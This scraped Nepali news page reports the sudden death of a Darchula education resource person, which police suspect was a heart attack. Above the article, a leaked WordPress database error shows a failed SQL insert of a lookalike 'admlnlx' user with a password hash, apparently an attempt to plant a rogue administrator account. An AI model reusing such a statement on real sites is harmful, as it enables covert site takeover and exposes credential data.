WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNxxbDuE09cZgqyRdGCSu0ODGhpmkI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 01:46:52', '', 'admlnlx', 'admlnlx')
बैतडी, मंसिर २९–
दार्चुलाको शङ्करपुर घर भएका एक स्रोतव्यक्तिको मङ्गलबार हिँड्दा हिँड्दै अकस्मात मृत्यु भएको छ ।
मृत्यु हुनेमा शङ्करपुर–३ सातचौरीका ४८ वर्षीय किसनसिंह धामी रहेको जिल्ला प्रहरी कार्यालय दार्चुलाका प्रहरी निरीक्षक रणबहादुर चन्दले राससलाई जानकारी दिनुभयो । प्रहरी निरीक्षक चन्दका अनुसार बिहान घरबाट मालिकार्जुन स्रोतकेन्द्र जाने बेलामा एक्कासि मृत्यु भएको हो । उहाँले भन्नुभयो, “विद्यालय गइरहेका धामी घर नजिकै रहेको पानीको धारा नजिकै मृत भेटिएका हुन् ।”
धामीको के कारणले मृत्यु भएको भन्ने खुल्न नसकेको जिल्ला प्रहरी कार्यालय दार्चुलाले जनाएको छ । हृदयाघातका कारण मृत्यु भएको हुनसक्ने प्रहरीको अनुमान रहेको छ ।
जिल्ला अस्पताल दार्चुलामा शवपरीक्षणपछि आफन्तको जिम्मा लगाइसकिएको छ । शवपरीक्षण गरिएपनि कसरी मुत्यु भएको हो भन्ने रिपोर्ट आएपछि मात्रै पुष्टि हुने प्रहरी निरीक्षक चन्दले बताउनुभयो । धामी दार्चुलाको मालिकार्जुन र गोकुलेश्वर स्रोतकेन्द्रका स्रोतव्यक्ति हुनुहुन्थ्यो । –रासस